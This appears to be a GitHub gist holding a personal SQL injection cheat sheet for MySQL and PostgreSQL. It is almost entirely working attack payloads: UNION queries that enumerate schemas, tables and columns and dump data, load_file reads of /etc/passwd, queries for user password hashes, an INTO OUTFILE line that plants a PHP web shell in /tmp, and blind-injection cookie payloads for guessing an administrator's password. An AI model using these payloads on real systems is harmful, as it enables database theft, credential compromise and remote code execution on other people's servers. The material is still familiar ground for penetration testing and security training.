Skip to content

Instantly share code, notes, and snippets.

@tanaka-geek

tanaka-geek/SQLi.md

Last active September 21, 2023 06:58
Show Gist options
  • Save tanaka-geek/ae1b55b7f2690d47916878561feeac7c to your computer and use it in GitHub Desktop.
Save tanaka-geek/ae1b55b7f2690d47916878561feeac7c to your computer and use it in GitHub Desktop.
Download ZIP
SQLinjection sqli sqli injection SQL sql
Raw
SQLi.md

UNION BASED

it is like basic thing to try

' UNION SELECT 1,version(),3,4,5,6
' UNION SELECT 1,version(),3,4,5,6,7,8,9... # add more until it works
' UNION ALL SELECT 1,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6 fRoM information_schema.schemata#
' UNION ALL SELECT 1,version(),gRoUp_cOncaT(0x7c,schema_name,0x7C),4,5,6 fRoM information_schema.schemata#

group_concat() or concat()?

group_concat() is mostly for rows, so use it to show the name of database,table
concat() is for columns. so use it to show columns of table.
you should use them both. This needs more research!!!

Show database

UNION ALL SELECT NULL,concat(schema_name) FROM information_schema.schemata

Show tables

UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='database1'

Show columns

UNION ALL SELECT NULL,concat(column_name) FROM information_schema.COLUMNS WHERE TABLE_NAME='table1'

Retrieve data

UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM table1
UNION ALL SELECT NULL,concat(0x28,column1,0x3a,column2,0x29) FROM database2.table1

read /etc/passwd

This will give a better insights about users in the system

select load_file("/etc/passwd");

make a file

Creates a /tmp/cmd.php and trigger with some LFI or smeh

select '<?php system($_GET["cmd"]); ?>' into outfile '/tmp/cmd.php';

Find a specific column in all tables

SELECT * FROM information_schema.columns WHERE column_name = 'column_name';

show important information

Version 	SELECT @@version
Comments 	SELECT 1; #comment
SELECT /*comment*/1;
Current User 	SELECT user();
SELECT system_user();
List Users 	SELECT user FROM mysql.user; — priv
List Password Hashes 	SELECT host, user, password FROM mysql.user; — priv

blind injection (beta)

mysql> select substring(system_user(),1,1)='r';
+----------------------------------+
| substring(system_user(),1,1)='r' |
+----------------------------------+
|                                1 |
+----------------------------------+
1 row in set (0.00 sec)

https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/

Copy and write it to system file

CREATE TEMP TABLE row(column text);INSERT INTO row(column) VALUES ($$brah$$)
COPY row(column) TO $$C:\somewhere\brah.txt$$

blind injection (from another table)

When an attempt was made to extract(guess) a password, certain conditionals must be compared.

The query below checks if the condition is true, the table 'users' exists if it has 'a' letter in it.

Cookie: TrackingId=buzzbuzz' OR (SELECT 'a' FROM users WHERE username='administrator') = 'a' -- - ;

This is a proper way of comparing the conditionals. T( select 'a' and LENGTH(pass)>1) ='a' == 'a' the resultant letter is a, but inside the conditional, there's password length comparison...

TrackingId=buzzbuzz' OR (SELECT 'a' FROM users where username='administrator' AND LENGTH(password)>1) ='a' -- -
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment